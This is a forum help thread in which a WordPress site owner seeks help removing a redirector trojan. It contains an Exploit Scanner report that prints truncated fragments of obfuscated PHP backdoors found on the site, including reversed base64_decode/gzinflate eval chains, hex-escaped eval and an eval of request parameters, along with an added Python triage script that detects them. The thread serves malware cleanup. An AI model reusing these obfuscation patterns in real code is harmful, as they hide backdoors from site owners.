Urgent My site is infected with JS: Redirector-NV [Trj]

Hello, I have a trojan on my site hxxp://www.actuafoot.fr/ but I could not find the script. I looked around the plugins, themes, etc …

That’s the title of the trojan: JS: Redirector-NV [Trj]

Here is a description of what I subject is infected with <http://www.viruslist.com
/ ru / search? Trojan.JS.Redirector.ue VN => Trojan.JS.Redirector.ue

There’s me that Avast detects this Trojan I looked around the files I find nothing

Thank you for helping me, it’s been quite a day and I am losing visitors.

Hi Actuafoot,

The issue is with: WordPress internal path: /homepages/45/d345406617/htdocs/actuafoot/wp-content/themes/actuafoot/index.php
and the plug-in code, scanning this is flagged as being suspicious: wXw.actuafoot.fr/tag/ziani suspicious
[suspicious:2] (ipaddr:82.165.56.93) (jsvar) wXw.actuafoot.fr/tag/ziani
Download WordPress exploit scanner from here: http://downloads.wordpress.org/plugin/exploit-scanner.1.2.zip
do a scan with it and report what you have found,

polonus

Hi Actuafoot,

You also have to consider this redirect from your site to: hxxp://mediacdn.disqus.com/1328833754/build/system/count.js
See: http://www.google.com/safebrowsing/diagnostic?site=mediacdn.disqus.com (site has been infecting domains)

polonus

Am I also infected through the Disqus plugin?

I installed Exploit Scanner. How long does the analysis take? I started it ten minutes ago.

Should I check if Disqus is infected?

Here is the report :

wp-includes/functions.php:190
Often used to execute malicious code if ( doubleval($bytes) >= $mag )
wp-includes/js/jquery/bruixola.php:1
Used by malicious scripts to decode previously obscured data/programs <? $GLOBALS['_401682669_']=Array(base64_decode('' .'Z' .'XJyb3JfcmVwb3J0aW' .'5n'),base64_decode('cHJlZ19' .'tY' .'XR' .'jaA=='),ba [line truncated]
wp-includes/js/tinymce/plugins/wpfullscreen/validator.php:1
Often used to execute malicious code oKvJWvKjg","wYKvee6QFdb85JA1M3SQ","2a39D4S1VAA=");eval("\x65\x76\x61\x6C\x28\x67\x7A\x75\x6E\x63\x6F\x
wp-content/plugins/wp-uber-menu/js/colorpicker/js/jquery.js:552
Often used to execute malicious code jQuery.globalEval( elem.text || elem.textContent || elem.innerHTM
wp-content/plugins/wp-uber-menu/js/colorpicker/js/jquery.js:3721
Often used to execute malicious code jQuery.globalEval( data );
wp-content/plugins/wp-uber-menu/styles/jquery.lightbox-0.5.php:1
Often used to execute malicious code rrev('edoced_46esab');$hgdv = strrev('etalfnizg');eval($hgdv($j_pg(implode('',$rwl)))); ?>
wp-content/plugins/disqus-comment-system/lib/api/disqus/json.php:258
Often used to execute malicious code return eval(‘return "’.str_replace(‘"’,‘"’,$buf).‘";’);
wp-content/plugins/contact-form-7/jquery.form.js:613
Often used to execute malicious code $.globalEval(data);
wp-content/plugins/contact-form-7/scripts.js:49
Often used to execute malicious code $.each(data.onSentOk, function(i, n) { eval(n) });
wp-content/plugins/contact-form-7/scripts.js:55
Often used to execute malicious code $.each(data.onSubmit, function(i, n) { eval(n) });
wp-content/plugins/more-fields/more-fields-field-types.php:358
Often used to execute malicious code var json = eval("(" + response + ")");
wp-content/plugins/more-fields/more-fields-field-types.php:396
Often used to execute malicious code var json = eval("(" + response + ")");
wp-content/plugins/wp-super-cache/wp-cache.php:2033
Used by malicious scripts to decode previously obscured data/programs replace( ‘…’, ‘’, preg_replace(“/(?.)?$/“, ‘’, base64_decode( $_GET[ ‘uri’ ] ) ) ) ) );
wp-content/plugins/wp-super-cache/wp-cache.php:2040
Used by malicious scripts to decode previously obscured data/programs replace( ‘…’, ‘’, preg_replace(”/(?.)?$/”, ‘’, base64_decode( $_GET[ ‘uri’ ] ) ) ) ) );
wp-content/plugins/wp-super-cache/wp-cache-phase1.php:211

Following:
Often used to execute malicious code eval( ‘?>’ . $cachefiledata . ‘<?php ' );
wp-content/plugins/wp-super-cache/wp-cache-phase1.php:216
Often used to execute malicious code eval( '?>’ . $cachefiledata . ‘<?php ' );
wp-content/plugins/wp-super-cache/wp-cache-phase1.php:252
Often used to execute malicious code eval( '?>’ . $cache . ‘<?php ' );
wp-content/plugins/wp-super-cache/wp-cache-phase1.php:269
Often used to execute malicious code eval( '?>’ . $uncompressed . ‘<?php ' );
wp-content/plugins/wp-super-cache/wp-cache-phase1.php:271
Often used to execute malicious code eval( '?>’ . $cache . ‘<?php ’ );
wp-content/plugins/wp-super-cache/Changelog.txt:1892
Often used to execute malicious code eval() and html.
wp-content/plugins/network-publisher/JSON.php:22
Often used to execute malicious code * Javascript, and can be directly eval()‘ed with no further parsing
wp-content/plugins/bitdefender-antispam-for-wordpress/img.php:5
Used by malicious scripts to decode previously obscured data/programs echo base64_decode(“R0lGODlhAQABALMAAP8p9/////////////////////////
wp-content/themes/actuafoot/header.php:86
Often used to execute malicious code eval(cadre+”.location=’“+selection.options[selection
wp-content/themes/actuafoot/scripts/js/jquery-ui.min.js:273
Often used to execute malicious code s=inlineSettings||{};try{inlineSettings[attrName]=eval(attrValue);}catch(err){inlineSettings[attrName]
wp-content/themes/actuafoot/scripts/js/jquery.min.js:12
Often used to execute malicious code .src,async:false,dataType:“script”})}else{o.globalEval(F.text||F.textContent||F.innerHTML||”“)}if(F.pa
wp-content/themes/actuafoot/scripts/js/jquery.min.js:19
Often used to execute malicious code )}if(typeof I===“string”){if(H==“script”){o.globalEval(I)}if(H==“json”){I=l"eval"}}return
stats/admin/scripts/jquery-plugin.js:2080
Often used to execute malicious code eval($this.onActions[“onOpen”])($this);
stats/admin/scripts/jquery-plugin.js:2097
Often used to execute malicious code eval($this.onActions[“onClose”])($this);
stats/admin/scripts/jquery-plugin.js:2283
Often used to execute malicious code eval($this.onActions[nm])($this);
stats/admin/scripts/jquery-plugin.js:2298
Often used to execute malicious code eval(options.onInit)($this);
stats/admin/scripts/jquery-plugin.min.js:1
Often used to execute malicious code t”,function(){if($this.onActions[“onOpen”]!=null){eval($this.onActions[“onOpen”])($this)}});if(childid!=msOldDiv){msOldDiv=childid}}};this.clos [line truncated]
stats/admin/scripts/json.php:22
Often used to execute malicious code * Javascript, and can be directly eval()‘ed with no further parsing
stats/images/clubs/wbuid.php:1
Used by malicious scripts to decode previously obscured data/programs <? $GLOBALS[‘401682669’]=Array(base64_decode(’’ .‘Z’ .‘XJyb3JfcmVwb3J0aW’ .‘5n’),base64_decode(‘cHJlZ19’ .‘tY’ .‘XR’ .‘jaA==’),ba [line truncated]
stats/prono/pronos.php:23
Often used to execute malicious code eval(‘document.matchid.m’+match+‘_0.src = ImgN.src’)
stats/prono/pronos.php:24
Often used to execute malicious code eval(‘document.matchid.m’+match+‘_1.src = Img1R.src’
stats/prono/pronos.php:25
Often used to execute malicious code eval(‘document.matchid.m’+match+‘_2.src = Img2.src’)
stats/prono/pronos.php:26
Often used to execute malicious code eval(‘PL[’+match+‘]=Ch1;’);
stats/prono/pronos.php:28
Often used to execute malicious code eval(‘document.matchid.m’+match+‘_0.src = ImgN.src’)
stats/prono/pronos.php:29
Often used to execute malicious code eval(‘document.matchid.m’+match+‘_1.src = Img1.src’)
stats/prono/pronos.php:30
Often used to execute malicious code eval(‘document.matchid.m’+match+‘_2.src = Img2R.src’
stats/prono/pronos.php:31
Often used to execute malicious code eval(‘PL[’+match+‘]=Ch2;’);
stats/prono/pronos.php:33
Often used to execute malicious code eval(‘document.matchid.m’+match+‘0.src = ImgNR.src’
stats/prono/pronos.php:34
Often used to execute malicious code eval(‘document.matchid.m’+match+‘1.src = Img1.src’)
stats/prono/pronos.php:35
Often used to execute malicious code eval(‘document.matchid.m’+match+‘2.src = Img2.src’)
stats/prono/pronos.php:36
Often used to execute malicious code eval(‘PL[’+match+‘]=ChN;’);
stats/prono/pronos.php:52
Often used to execute malicious code eval('document.matchid.r
’+i+‘.value=PL[’+i+‘];’);
stats/prono/pronos.php:54
Often used to execute malicious code else { eval('document.matchid.r
’+i+‘.value=undefined;’); }
stats/prono/pronos.php:56
Often used to execute malicious code else { eval('document.matchid.r
’+i+‘.value=undefined;’); }
stats/scripts/jquery-1.4.4.min.js:20
Often used to execute malicious code url:b.src,async:false,dataType:“script”}):c.globalEval(b.text||b.textContent||b.innerHTML||“”);b.paren
stats/scripts/jquery-1.4.4.min.js:144
Often used to execute malicious code =“script”||!b&&e.indexOf(“javascript”)>=0)c.globalEval(a);return a}});
stats/scripts/jquery-ui-1.8.6.custom.min.js:1
Often used to execute malicious code =a.getAttribute(“date:”+e);if(f){c=c||{};try{c[e]=eval(f)}catch(h){c[e]=f}}}e=a.nodeName.toLowerCase()
d23f3b6aad511d38269d66625f66f77848dce7d7.php:280

Following:
Used by malicious scripts to decode previously obscured data/programs return rsa_verify($message, base64_decode($signature), $public_key, $modulus, $keylength)
d23f3b6aad511d38269d66625f66f77848dce7d7.php:288
Used by malicious scripts to decode previously obscured data/programs return rsa_decrypt(base64_decode($message), $private_key, $modulus, $keylength);
d23f3b6aad511d38269d66625f66f77848dce7d7.php:317
Used by malicious scripts to decode previously obscured data/programs $enc_text = base64_decode($enc_text);
d23f3b6aad511d38269d66625f66f77848dce7d7.php:354
Often used to execute malicious code $success = @eval(‘?>’.$request->params);
Level Warning (45 matches)
Location / Description What was matched
wp-config-sample.php
Modified core file See what has been modified
wp-load.php
Modified core file See what has been modified
wp-admin/setup-config.php
Modified core file See what has been modified
wp-includes/functions.php
Modified core file See what has been modified
wp-includes/load.php
Modified core file See what has been modified
wp-includes/ms-load.php
Modified core file See what has been modified
wp-includes/ms-settings.php
Modified core file See what has been modified
wp-includes/version.php
Modified core file See what has been modified
wp-includes/wp-db.php
Modified core file See what has been modified
wp-includes/images/crystal/license.txt
Modified core file See what has been modified
wp-includes/js/scriptaculous/MIT-LICENSE
Modified core file See what has been modified
wp-includes/js/tinymce/plugins/wpfullscreen/css/wp-fullscreen.css
Modified core file See what has been modified
license.txt
Modified core file See what has been modified
readme.html
Modified core file See what has been modified
wp-includes/js/jquery/getquote.php:7
The e modifier in preg_replace can be used to execute malicious code
wp-content/plugins/wp-uber-menu/js/jpicker/jpicker-1.1.5.min.js:1
iframes are sometimes used to load unwanted adverts and code on your site el){return}var aA=R.find(“table:first”);R.before(“
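
A triage sketch for a report like the one above, added here as an example; it is not part of the original thread or of the Exploit Scanner plugin. It separates bare `eval`/`globalEval` matches in stock libraries from entries that also show obfuscation, and statically decodes split `base64_decode` literals. The function names, the directory list and the heuristics are assumptions, and the sample findings are shortened from the report.

```python
import base64
import re

# Constructed sample: (location, matched text) pairs shortened from the report above.
FINDINGS = [
    ("wp-includes/js/jquery/bruixola.php:1",
     "<? $GLOBALS['_401682669_']=Array(base64_decode('' .'Z' .'XJyb3JfcmVwb3J0aW' .'5n'),"),
    ("wp-content/plugins/wp-uber-menu/styles/jquery.lightbox-0.5.php:1",
     "rrev('edoced_46esab');$hgdv = strrev('etalfnizg');eval($hgdv($j_pg(implode('',$rwl))));"),
    ("wp-includes/js/tinymce/plugins/wpfullscreen/validator.php:1",
     r'eval("\x65\x76\x61\x6C\x28\x67\x7A\x75\x6E\x63\x6F'),
    ("wp-content/plugins/contact-form-7/jquery.form.js:613", "$.globalEval(data);"),
    ("wp-content/themes/actuafoot/scripts/js/jquery.min.js:12",
     'o.globalEval(F.text||F.textContent||F.innerHTML||"")'),
]
# Assumed heuristics (hypothetical names), chosen from patterns visible in the report.
SENSITIVE = {"base64_decode", "gzinflate", "gzuncompress", "str_rot13", "eval"}
ASSET_DIRS = {"js", "images", "styles", "css"}

def indicators(location, text):
    """Return obfuscation indicators that set a finding apart from a bare eval() match."""
    path = location.rsplit(":", 1)[0]
    found = []
    if path.endswith(".php") and ASSET_DIRS & set(path.split("/")[:-1]):
        found.append("php-in-asset-dir")        # PHP file in a static-asset directory
    if re.search(r"""['"]\s*\.\s*['"]""", text):
        found.append("split-string-literal")    # 'Z' .'XJy...' concatenation
    if any(lit[::-1] in SENSITIVE for lit in re.findall(r"'([^']+)'", text)):
        found.append("reversed-function-name")  # strrev('edoced_46esab')
    if re.search(r"""eval\(\s*["'](?:\\x[0-9A-Fa-f]{2}){4,}""", text):
        found.append("hex-escaped-eval")        # eval("\x65\x76...")
    return found

def decode_split_base64(text):
    """Statically join 'a' .'b' fragments passed to base64_decode() and decode them."""
    out = []
    for args in re.findall(r"base64_decode\(((?:\s*'[^']*'\s*\.?)+)\)", text):
        joined = "".join(re.findall(r"'([^']*)'", args))
        out.append(base64.b64decode(joined).decode("ascii", "replace"))
    return out

def triage(findings):
    """Map each location to its indicators; an empty list means a generic match only."""
    return {loc: indicators(loc, text) for loc, text in findings}

if __name__ == "__main__":
    for loc, why in triage(FINDINGS).items():
        print(("REVIEW FIRST " if why else "generic      ") + loc, why)
    print(decode_split_base64(FINDINGS[0][1]))
```

An empty indicator list does not clear a file; it only means the scanner's match alone gives no reason to look at it before the others.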

Going to the site I do not experience any avast shield alert,

polonus